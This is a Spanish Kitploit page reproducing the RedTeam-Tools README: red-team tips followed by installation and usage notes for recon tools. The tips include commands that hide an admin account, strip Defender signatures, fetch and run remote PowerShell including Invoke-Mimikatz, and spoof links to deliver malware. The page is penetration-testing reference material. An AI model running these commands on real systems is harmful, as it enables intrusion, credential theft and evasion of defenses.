Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
RedTeam-Tools — Herramientas y Técnicas para Red Team / Pruebas de Penetración | Kitploit
Herramientas/GitHubGitHub/a-poc/redteam-tools
OSINT (Inteligencia de Fuentes Abiertas)Escalada de PrivilegiosReconocimientoExplotaciónMovimiento LateralPost-ExplotaciónPhishingPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHuba-poc/redteam-tools
9.6k1.3k34hace 5 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

RedTeam-Tools

Herramientas y Técnicas para Red Team / Pruebas de Penetración

Ver Repositorio

RedTeam-Tools

Este repositorio de GitHub contiene una colección de 150+ herramientas y recursos que pueden ser útiles para actividades de red team.

Algunas de las herramientas pueden estar específicamente diseñadas para red team, mientras que otras son de propósito más general y pueden adaptarse para su uso en un contexto de red team.

🔗 Si eres un Blue Teamer, echa un vistazo a BlueTeam-Tools

Advertencia

Los materiales en este repositorio son solo con fines informativos y educativos. No están destinados para su uso en actividades ilegales.

Nota

Oculta los encabezados de la lista de herramientas con la flecha.

Haz clic en 🔙 para volver a la lista.

Lista de Herramientas

Consejos de Red Team 19 consejos
    • Mejora del contrabando HTML con event listener de movimiento del ratón @pr0xylife
    • Google Translate para phishing @malmoeb
    • Ocultar la cuenta de administrador local @Alh4zr3d
    • Inutilizar Windows Defender eliminando firmas @Alh4zr3d
    • Habilitar múltiples sesiones RDP por usuario @Alh4zr3d
    • Alternativa local a Sysinternals PsExec.exe @GuhnooPlusLinux
    • Escáner de puertos que vive del terreno @Alh4zr3d
    • DownloadString de PowerShell con soporte de proxy @Alh4zr3d
    • Buscar endpoints internos en marcadores del navegador @Alh4zr3d
    • Consultar registros DNS para enumeración @Alh4zr3d
    • Rutas de servicio sin comillas sin PowerUp @Alh4zr3d
    • Bypass de un símbolo del sistema deshabilitado con /k Martin Sohn Christensen
    • Evitar que Windows Defender elimine mimikatz.exe @GuhnooPlusLinux
    • Comprobar si estás en una máquina virtual @dmcxblue
    • Enumerar reglas de AppLocker @Alh4zr3d
    • Atajo de CMD con 6 píxeles mediante mspaint PenTestPartners
    • Suplantación de enlaces con el método JavaScript PreventDefault
    • Comprobar reglas de firewall SMB con Responder @malmoeb
    • Deshabilitar AV con SysInternals PsSuspend @0gtweet
Reconocimiento 24 herramientas
    • spiderfoot OSINT automatizado y mapeo de superficie de ataque
    • reconftw Herramienta automatizada de reconocimiento de subdominios y vulnerabilidades
    • subzy Comprobador de vulnerabilidades de subdominio takeover
    • smtp-user-enum Enumeración de usuarios SMTP
    • crt.sh -> httprobe -> EyeWitness Captura de pantalla automatizada de dominios
    • jsendpoints Extraer enlaces DOM de la página
    • nuclei Escáner de vulnerabilidades
    • certSniff Sniffer de palabras clave en registros de transparencia de certificados
    • gobuster Fuerza bruta de rutas de sitios web
    • feroxbuster Herramienta rápida de descubrimiento de contenido escrita en Rust
    • CloudBrute Fuerza bruta de infraestructura en la nube
    • dnsrecon Enumerar registros DNS
    • Shodan.io Base de conocimiento de sistemas públicos
    • AORT (All in One Recon Tool) Enumeración de subdominios
    • spoofcheck Comprobador de registros SPF/DMARC
    • AWSBucketDump Enumeración de buckets S3
    • GitHarvester Buscador de credenciales en GitHub
    • truffleHog Escáner de credenciales en GitHub
    • Dismap Descubrimiento/identificación de activos
    • enum4linux Enumeración de Windows/samba
Desarrollo de Recursos 12 herramientas
    • remoteinjector Inyectar enlace de plantilla remota en un documento de Word
    • Chimera Ofuscación de PowerShell
    • msfvenom Creación de payloads
    • Shellter Herramienta dinámica de inyección de shellcode
    • Freeze Creación de payloads (evadiendo EDR)
    • WordSteal Robar hashes NTML con Microsoft Word
    • NTAPI Undocumented Functions Kernel NT de Windows, API nativa y controladores
    • Kernel Callback Functions APIs de Windows no documentadas
    • OffensiveVBA Técnicas de ejecución y evasión de macros de Office
    • WSH Payload de Wsh
    • HTA Payload de Hta
    • VBA Payload de Vba
Acceso Inicial 10 herramientas
    • CredMaster Herramienta de rociado de contraseñas de CredKing
    • TREVORspray Rociador de contraseñas con hilos
    • evilqr PoC de phishing QRLJacking
    • CUPP Perfilador de contraseñas de usuarios comunes (CUPP)
    • Bash Bunny Herramienta de ataque USB
    • EvilGoPhish Framework de campañas de phishing
    • The Social-Engineer Toolkit Framework de campañas de phishing
    • Hydra Herramienta de fuerza bruta
    • SquarePhish Framework de phishing OAuth/código QR
    • King Phisher Framework de campañas de phishing
Ejecución 13 herramientas
    • Responder Envenenador de LLMNR, NBT-NS y MDNS
    • secretsdump Volcador remoto de hashes
    • evil-winrm Shell de WinRM
    • Donut Ejecución .NET en memoria
    • Macro_pack Ofuscación de macros
    • PowerSploit Suite de scripts de PowerShell
    • Rubeus Herramienta de hackeo de Active Directory
    • SharpUp Identificador de vulnerabilidades de Windows
    • SQLRecon Toolkit ofensivo de MS-SQL
    • UltimateAppLockerByPassList Técnicas comunes de bypass de AppLocker
    • StarFighters Lanzador de Empire basado en JavaScript y VBScript
    • demiguise Herramienta de cifrado de HTA
    • PowerZure Framework de PowerShell para evaluar la seguridad de Azure
Persistencia 4 herramientas
    • Impacket Suite de scripts de Python
    • Empire Framework de post-explotación
    • SharPersist Toolkit de persistencia en Windows
    • ligolo-ng Herramienta de tunelización que usa una interfaz TUN
Escalada de Privilegios 11 herramientas
    • Crassus Herramienta de descubrimiento de escalada de privilegios en Windows
    • LinPEAS Escalada de privilegios en Linux
    • WinPEAS Escalada de privilegios en Windows
    • linux-smart-enumeration Escalada de privilegios en Linux
    • Certify Escalada de privilegios en Active Directory
    • Get-GPPPassword Extracción de contraseñas de Windows
    • Sherlock Herramienta de escalada de privilegios en PowerShell
    • Watson Herramienta de escalada de privilegios en Windows
    • ImpulsiveDLLHijack Herramienta de secuestro de DLL
    • ADFSDump Herramienta de volcado de AD FS
    • BeRoot Proyecto de escalada de privilegios multi-SO
Evasión de Defensas 8 herramientas
    • Invoke-Obfuscation Ofuscador de scripts
    • Veil Ofuscador de payloads de Metasploit
    • SharpBlock Bypass de EDR mediante prevención de ejecución en el punto de entrada
    • Alcatraz Ofuscador GUI de binarios x64
    • Mangle Manipulación de ejecutables compilados
    • AMSI Fail Fragmentos de PowerShell que rompen o deshabilitan AMSI
    • ScareCrow Framework de creación de payloads diseñado para bypass de EDR
    • moonwalk Eliminador de registros del sistema Linux y marcas de tiempo del sistema de archivos
Acceso a Credenciales 11 herramientas
    • Mimikatz Extractor de credenciales de Windows
    • LaZagne Extractor local de contraseñas
    • hashcat Descifrado de hashes de contraseñas
    • John the Ripper Descifrado de hashes de contraseñas
    • SCOMDecrypt Herramienta de descifrado de credenciales SCOM
    • nanodump Creación de minivolcados del proceso LSASS
    • eviltree Recreación de tree para descubrimiento de credenciales
    • SeeYouCM-Thief Análisis de archivos de configuración de sistemas telefónicos Cisco
    • MailSniper Buscador de correos en Microsoft Exchange
    • SharpChromium Extractor de cookies, historial e inicios de sesión guardados de Chromium
    • dploot Robo remoto de DPAPI en Python
Descubrimiento 6 herramientas
    • PCredz Descubrimiento de credenciales en PCAP/interfaz en vivo
    • PingCastle Evaluador de Active Directory
    • Seatbelt Escáner local de vulnerabilidades
    • ADRecon Reconocimiento de Active Directory
    • adidnsdump Volcado de DNS integrado de Active Directory
    • scavenger Herramienta de escaneo para rastrear sistemas
Movimiento Lateral 12 herramientas
    • crackmapexec Toolkit de movimiento lateral en Windows/Active Directory
    • WMIOps Comandos remotos WMI
    • PowerLessShell PowerShell remoto sin PowerShell
    • PsExec Reemplazo ligero de telnet
    • LiquidSnake Movimiento lateral sin archivos
    • Habilitar RDP Comando para habilitar RDP en Windows
    • Actualizar shell a meterpreter Mejora de reverse shell
    • Reenvío de Puertos Comando de reenvío de puertos local
    • Reverse shell de Jenkins Comando de shell de Jenkins
    • ADFSpoof Forjar tokens de seguridad de AD FS
    • kerbrute Herramienta para realizar fuerza bruta de pre-autenticación Kerberos
    • Coercer Coaccionar a un servidor Windows para que se autentique
    • WMIOps Comandos remotos WMI
Recolección 3 herramientas
    • BloodHound Visualización de Active Directory
    • Snaffler Recolector de credenciales de Active Directory
    • linWinPwn Enumeración de Active Directory y comprobación de vulnerabilidades
Comando y Control 9 herramientas
    • Living Off Trusted Sites Project Aprovechar dominios legítimos para tu C2
    • Havoc Framework de comando y control
    • Covenant Framework de comando y control (.NET)
    • Merlin Framework de comando y control (Golang)
    • Metasploit Framework Framework de comando y control (Ruby)
    • Pupy Framework de comando y control (Python)
    • Brute Ratel Framework de comando y control ($$$)
    • NimPlant Implante C2 escrito en Nim
    • Hoaxshell Reverse shell de PowerShell
Exfiltración 6 herramientas
    • Dnscat2 C2 mediante túnel DNS
    • Cloakify Transformación de datos para exfiltración
    • PyExfil PoC de exfiltración de datos
    • Powershell RAT Backdoor basado en Python
    • GD-Thief Exfiltración de Google Drive
    • goshs Servidor multiprotocolo de binario único para transferencia de archivos y exfiltración
Impacto 4 herramientas
    • Conti Pentester Guide Leak Toolkit de afiliados del grupo de ransomware Conti
    • SlowLoris Denegación de servicio simple
    • usbkill Interruptor de apagado anti-forense
    • Keytap Obtener teclas presionadas a partir del audio de escritura

Consejos de Red Team

Aprende de los Red Teamers con una colección de consejos de Red Team. Estos consejos cubren una variedad de tácticas, herramientas y metodologías para mejorar tus habilidades de red team.

🔙Mejora del contrabando HTML con event listener de movimiento del ratón

Descripción: 'Qakbot añadió un EventListener para el movimiento del ratón al adjunto de contrabando HTML para evitar la evasión en sandboxes; el zip no se soltará.'

Crédito: @pr0xylife

Enlace: Twitter

🔙Google Translate para phishingDescripción: Robo exitoso de credenciales de una página de phishing proxyado a través de la funcionalidad de vista de página de Google Translate.

Crédito: @malmoeb

Enlace: Twitter

🔙Ocultar la cuenta de administrador local```bash

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f

root@kitploit:~
**Descripción:** *'Crear cuentas es arriesgado al evadir el equipo azul, pero al crear un administrador local, usa un poco de magia en el registro para ocultarlo.'*

**Crédito:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Enlace:** [Twitter](https://twitter.com/Alh4zr3d/status/1612913838999113728)

### [🔙](#tool-list)Inhabilitar Windows Defender eliminando firmas```bash
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Descripción: 'Un poco desordenado, pero si Windows Defender te está causando un gran dolor de cabeza, en lugar de desactivarlo (lo que alerta al usuario), deberías neutralizarlo eliminando todas las firmas.'

Crédito: @Alh4zr3d

Enlace: Twitter

🔙Habilitar múltiples sesiones RDP por usuario```bash

reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f

root@kitploit:~
**Descripción:** *'A veces quieres iniciar sesión en un host mediante RDP o similar, pero tu usuario tiene una sesión activa. Habilita múltiples sesiones por usuario.'*

**Crédito:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Enlace:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016)

### [🔙](#tool-list)Alternativa local a Sysinternals PsExec.exe```bash
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "

Descripción: '¿Estás cansado de subir Sysinternals PsExec.exe al hacer movimiento lateral? Windows tiene una mejor alternativa preinstalada. Prueba esta en su lugar.'

Crédito: @GuhnooPlusLinux

Enlace: Twitter

🔙Escáner de puertos con herramientas nativas```bash

0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$)) "Port $ open"} 2>$null

root@kitploit:~
**Descripción:** *'Cuando sea posible, usa lo disponible en lugar de subir herramientas a las máquinas (por muchas razones). PowerShell/.NET ayudan. Ej: escáner de puertos simple en PowerShell.'*

**Crédito:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Enlace:** [Twitter](https://twitter.com/Alh4zr3d/status/1605060950339588096)

### [🔙](#tool-list)Proxy aware PowerShell DownloadString```bash
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")

Descripción: 'La mayoría de las grandes organizaciones usan proxies web hoy en día. El cradle de descarga estándar de PowerShell no es consciente del proxy. Usa este.'

Crédito: @Alh4zr3d

Enlace: Twitter

🔙Buscando endpoints internos en los marcadores del navegador```bash

type "C:\Users%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"

root@kitploit:~
**Descripción:** *'Te sorprendería lo que puedes descubrir solo con los marcadores de un usuario. Por ejemplo, puntos finales internos a los que puede acceder.'*

**Crédito:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Enlace:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200)

### [🔙](#tool-list)Consultar registros DNS para enumeración```bash
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>

Descripción: 'La enumeración es el 95% del juego. Sin embargo, lanzar toneladas de escaneos para evaluar el entorno es muy ruidoso. ¿Por qué no simplemente preguntar al servidor DC/DNS por todos los registros DNS?'

Crédito: @Alh4zr3d

Enlace: Twitter

🔙Rutas de servicio sin comillas sin PowerUp```bash

Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$.StartMode -eq "Auto" -and $.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

root@kitploit:~
**Descripción:** *'Encontrando rutas de servicio sin comillas sin PowerUp'*

**Crédito:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Enlace:** [Twitter](https://twitter.com/Alh4zr3d/status/1579254955554136064)

### [🔙](#tool-list)Evitar un símbolo del sistema deshabilitado con /k```bash
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"

Descripción: 'Este símbolo del sistema ha sido deshabilitado por su administrador...' Por lo general se puede ver en entornos como PCs kiosko, una solución rápida y poco ortodoxa es usar /k a través del cuadro de ejecución de Windows. Esto ejecutará el comando y luego mostrará el mensaje de restricción, permitiendo la ejecución de comandos.

Crédito: Martin Sohn Christensen

Enlace: Blog

🔙Detener que Windows Defender elimine mimikatz.exe```bash

(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv

root@kitploit:~
**Descripción:** *'¿Estás cansado de que Windows Defender elimine mimikatz.exe? Prueba esto en su lugar.'*

**Crédito:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)

**Enlace:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216)

### [🔙](#tool-list)Comprueba si estás en una máquina virtual```bash
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"

Descripción: '¿Quieres saber si estás en una máquina virtual? ¡Consulta las claves del registro y descúbrelo! Si aparecen resultados, entonces estás en una máquina virtual.'

Crédito: @dmcxblue

Enlace: Twitter

🔙Enumerate AppLocker rules```

(Get-AppLockerPolicy -Local).RuleCollections

Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

root@kitploit:~
**Descripción:** *'AppLocker puede ser un fastidio. Enumera para ver qué tan doloroso es'*

**Crédito:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Enlace:** [Twitter](https://twitter.com/alh4zr3d/status/1614706476412698624)

### [🔙](#tool-list)Acceso directo a CMD con 6 píxeles mediante mspaint

![image](https://assets.kitploit.com/production/public/readmes/147/db03137fe19c2c20481ca53abc8beb4b7afadcf1d2add350ce26d37f75fdc41b.png)

1. Abra MSPaint.exe y establezca el tamaño del lienzo en: Ancho=6 y Alto=1 píxeles
2. Acérquese para facilitar las siguientes tareas
3. Usando el selector de color, establezca los valores de los píxeles a (de izquierda a derecha):
    - 1º: R: 10, G: 0, B: 0
    - 2º: R: 13, G: 10, B: 13
    - 3º: R: 100, G: 109, B: 99
    - 4º: R: 120, G: 101, B: 46
    - 5º: R: 0, G: 0, B: 101
    - 6º: R: 0, G: 0, B: 0
4. Guárdelo como Mapa de bits de 24 bits (*.bmp;*.dib)
5. Cambie su extensión de bmp a bat y ejecútelo.

**Descripción:** *'Un método inusual, pero efectivo, de obtener un shell creando un acceso directo a cmd.exe dibujando ciertos colores en Microsoft Paint. Debido al algoritmo de codificación utilizado para escribir archivos BMP, es posible dictar datos ASCII escritos en un archivo seleccionando cuidadosamente ciertos colores RGB.'*

**Crédito:** [PenTestPartners](https://www.pentestpartners.com/)

**Enlace:** [Blog](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/#gainingacommandshell)

### [🔙](#tool-list)Suplantación de enlaces con el método JavaScript PreventDefault

![image](https://assets.kitploit.com/production/public/readmes/147/49ceb382e5692c79df8ca9b96ed0c17520b7cf7f1091b5b6c214478270c165e8.png)```html
<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>PreventDefault Example</title>
  </head>
  <body>
    <a href="https://google.com" onclick="event.preventDefault(); window.location.href = 'https://bing.com';">Go to Google</a>
  </body>
</html>

Descripción: Se ha observado que actores de amenazas utilizan esta técnica para engañar a las víctimas y hacer que hagan clic en enlaces de descarga de malware falsificados dentro de la página. Usando el método JavaScript PreventDefault, puedes falsificar el enlace de hover para mostrar un enlace legítimo google.com, pero al hacer clic, la víctima será redirigida a tu enlace malicioso bing.com. Ideal para lograr que las víctimas descarguen cargas útiles a través de un sitio controlado.

Enlace: Documentación de PreventDefault

🔙Verificar reglas de firewall SMB con Responder

image```powershell Copy-Item -Path "C:\tmp" -Destination "\<ip_running_responder>\c$"

root@kitploit:~
**Descripción:** *'Cuando realizo una Evaluación de Compromiso, a menudo le pregunto al cliente si puedo hacer una última verificación rápida: `Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"`. Si Responder pudiera capturar el hash, el firewall permite conexiones SMB salientes'*

**Crédito:** [@malmoeb](https://twitter.com/malmoeb)

**Enlace:** [Twitter](https://twitter.com/malmoeb/status/1628272928855826433)

### [🔙](#tool-list)Desactivar AV con SysInternals PsSuspend

![image](https://assets.kitploit.com/production/public/readmes/147/060631566db51351ace6c248b736fc8878e89ba9aaf8ad4aaf2e478183468b16.png)

**Descripción:** *'Usando la herramienta Sysinternals de Microsoft PsSuspend.exe es posible suspender algunos ejecutables de servicios de antivirus. A la herramienta firmada por Microsoft se le puede pasar el PID o el nombre de un servicio en ejecución, y suspenderá el proceso a través de la API de Windows NtSuspendProcess.'*

**Publicación de blog relacionada:** [Evadiendo AV mediante Suspensión de Procesos con PsSuspend.exe](https://medium.com/@a-poc/process-suspension-with-pssuspend-exe-0cdf5d16a3b7)

**Enlace:** [Twitter](https://twitter.com/0gtweet/status/1638069413717975046)

Reconocimiento
====================

### [🔙](#tool-list)[spiderfoot](https://github.com/smicallef/spiderfoot)

SpiderFoot es una herramienta de automatización de inteligencia de código abierto (OSINT). Se integra con casi todas las fuentes de datos disponibles y utiliza una variedad de métodos para el análisis de datos, facilitando la navegación de esos datos.

SpiderFoot se puede usar de manera ofensiva (por ejemplo, en un ejercicio de red team o prueba de penetración) para el reconocimiento de su objetivo, o de manera defensiva para recopilar información sobre lo que usted o su organización podrían haber expuesto en Internet.

**Instalación:**```bash
wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz
tar zxvf v4.0.tar.gz
cd spiderfoot-4.0
pip3 install -r requirements.txt

Para obtener instrucciones completas de instalación, consulte aquí.

Uso:```python python3 ./sf.py -l 127.0.0.1:5001

root@kitploit:~
Lots of videos tutoriales de uso [aquí](https://asciinema.org/~spiderfoot)

![spiderfoot](https://assets.kitploit.com/production/public/readmes/147/bd95a49c8707ebb8b864103b3c024971be0bfef116fecada0a5499165378da14.png)

*Imagen usada de https://github.com/smicallef/spiderfoot*

### [🔙](#tool-list)[reconftw](https://github.com/six2dez/reconftw)

reconFTW automatiza todo el proceso de reconocimiento por ti. Supera el trabajo de enumeración de subdominios junto con varias comprobaciones de vulnerabilidades y la obtención de la máxima información sobre tu objetivo.

**Instalación:**```bash
git clone https://github.com/six2dez/reconftw.git;cd reconftw/;./install.sh

Para las instrucciones completas de instalación, consulta aquí.

Uso:```bash

Single target domain

./reconftw.sh -d target.com -r

One target with multiple domains

./reconftw.sh -m target -l domains.txt -r

Passive recon

./reconftw.sh -d target.com -p

Perform all checks and exploitations

./reconftw.sh -d target.com -a

root@kitploit:~
Para obtener instrucciones de uso completas, consulta [aquí](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide).

![reconftw](https://assets.kitploit.com/production/public/readmes/147/319a1191b403d8b616058e77f696f9b2802b59607cc7e908a38e61a8de99a25e.png)

*Imagen utilizada de https://www.youtube.com/watch?v=TQmDAtkD1Wo*

### [🔙](#tool-list)[subzy](https://github.com/PentestPad/subzy)

Herramienta de takeover de subdominios que funciona basándose en la coincidencia de huellas de respuesta de [can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz/blob/master/README.md).

**Instalación:**```bash
go install -v github.com/PentestPad/subzy@latest

Para obtener instrucciones completas de instalación, consulte aquí.

Uso:```bash

List of subdomains

./subzy run --targets list.txt

Single or multiple targets

./subzy run --target test.google.com ./subzy run --target test.google.com,https://test.yahoo.com

root@kitploit:~
![subzy](https://assets.kitploit.com/production/public/readmes/147/cb8d580bf7a8b0647632d14dda58e9f350703db0fa10ef16cfdc04464520c063.jpg)

*Imagen utilizada de https://www.geeksforgeeks.org/subzy-subdomain-takeover-vulnerability-checker-tool/*

### [🔙](#tool-list)[smtp-user-enum](https://github.com/cytopia/smtp-user-enum)

Enumeración de usuarios SMTP mediante VRFY, EXPN y RCPT con funcionalidad inteligente de tiempo de espera, reintento y reconexión.

**Instalación:**```bash
pip install smtp-user-enum

Uso:```bash smtp-user-enum [options] -u/-U host port smtp-user-enum --help smtp-user-enum --version

root@kitploit:~
![smtp-user-enum](https://assets.kitploit.com/production/public/readmes/147/d5d973253dfaa7e98d497954d59b83f166ba7b3807d24714a6ac40189fbdc15e.png)

*Imagen usada de https://www.kali.org/tools/smtp-user-enum/*

### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness

He preparado un one-liner de bash que: 
- Pasivamente recopila una lista de subdominios a partir de asociaciones de certificados ([crt.sh](https://crt.sh/))
- Activamente solicita cada subdominio para verificar su existencia ([httprobe](https://github.com/tomnomnom/httprobe))
- Activamente toma capturas de pantalla de cada subdominio para revisión manual ([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness))

**Uso:**```bash
domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web

Nota: Debes tener instalados httprobe, pup y EyeWitness, y cambiar 'DOMAIN_COM' por el dominio objetivo. Puedes ejecutar este script de forma concurrente en ventanas de terminal si tienes múltiples dominios raíz objetivo

image

image

🔙jsendpoints

Un bookmarklet de JavaScript para extraer todos los enlaces de endpoints de una página web.

Creado por @renniepak, este fragmento de código JavaScript se puede utilizar para extraer todos los endpoints (que comiencen con /) del DOM de la página web actual, incluyendo todas las fuentes de scripts externos incrustados en la página.```javascript javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"
")})}setTimeout(writeResults,3e3);})();

root@kitploit:~
**Uso (Marcador)** 

Crea un marcador...

- `Haga clic derecho en la barra de marcadores`
- `Haga clic en 'Agregar página'`
- `Pegue el Javascript anterior en el cuadro 'url'`
- `Haga clic en 'Guardar'`

...luego visite la página víctima en el navegador y haga clic en el marcador.

![imagen](https://assets.kitploit.com/production/public/readmes/147/a2a9b8ff2cacdcf419b64a6d99075dffa73471eea1201fb9a0a6b2524794849f.png)

**Uso (Consola)** 

Pegue el Javascript anterior en la ventana de la consola `F12` y presione Enter.

![imagen](https://assets.kitploit.com/production/public/readmes/147/5dd2a02f0f6874c521b8a98f35f653b1cf1a13b00a4c7e3eaf7c111700c0cc8a.png)

### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei)

Escáner de vulnerabilidades rápido que utiliza plantillas .yaml para buscar problemas específicos.

**Instalación:**```bash
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

Uso:```bash cat domains.txt | nuclei -t /PATH/nuclei-templates/

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/a747b7be6260c2a228ac90ac4c3500debb25dd3bf1f635c5ce736159cdd7bc81.png)

### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff)

certSniff es un vigilante de palabras clave en los registros de transparencia de certificados que escribí en Python. Utiliza la biblioteca certstream para observar los registros de creación de certificados que contienen palabras clave, definidas en un archivo.

Puedes configurarlo para que se ejecute con varias palabras clave relacionadas con tu dominio víctima; cualquier creación de certificado será registrada y puede llevar al descubrimiento de dominios que antes desconocías.

**Instalación:**```bash
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt

Uso:```python python3 certSniff.py -f example.txt

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/61dca92ec35e9bafb2004f44e045f4fa02fb05263456ac447c323e7becb3cbc3.png)

### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/)

Excelente herramienta para realizar ataques de fuerza bruta en rutas de archivos/carpetas de un sitio web víctima.

**Instalación:**```bash
sudo apt install gobuster

Uso:```bash gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/49bbb3fa465f423a5b3fa1dbe2468cb9c70ad4600532825a759da5b911a2c890.png)

### [🔙](#lista-de-herramientas)[feroxbuster](https://github.com/epi052/feroxbuster)

Herramienta diseñada para realizar **Forced Browsing** (navegación forzada), un ataque cuyo objetivo es enumerar y acceder a recursos que no están referenciados por la aplicación web, pero que siguen siendo accesibles para un atacante.

Feroxbuster utiliza fuerza bruta combinada con un diccionario de palabras para buscar contenido no enlazado en directorios objetivo. Estos recursos pueden almacenar información sensible sobre aplicaciones web y sistemas operativos, como código fuente, credenciales, direccionamiento de red interno, etc.

**Instalación: (Kali)**```bash
sudo apt update && sudo apt install -y feroxbuster

Instalar: (Mac)```bash curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash

root@kitploit:~
**Instalación: (Windows)**```bash
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V

Para obtener instrucciones completas de instalación, consulte aquí.

Uso:```bash

Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url

./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx

Scan with headers

./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"

Read URLs from stdin

cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

Proxy requests through burpsuite

./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080

root@kitploit:~
Se pueden encontrar ejemplos completos de uso [aquí](https://epi052.github.io/feroxbuster-docs/docs/examples/).

![image](https://assets.kitploit.com/production/public/readmes/147/bddd1a012eb92f79a03b1f6dd3cb9f31a9b0751776541044adcf234332421a08.png)

*Imagen utilizada de https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif*

### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute)

Una herramienta para encontrar la infraestructura, archivos y aplicaciones de una empresa (objetivo) en los principales proveedores de la nube (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).

Características:

- Detección en la nube (API de IPINFO y Código Fuente)
- Rápido (concurrente)
- Multiplataforma (Windows, Linux, Mac)
- Aleatorización de User-Agent
- Aleatorización de Proxy (HTTP, Socks5)

**Instalación:** 

Descarga la última [versión](https://github.com/0xsha/CloudBrute/releases) para tu sistema y sigue las instrucciones de uso.

**Uso:**```bash
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

image

Imagen usada de https://github.com/0xsha/CloudBrute

🔙dnsrecon

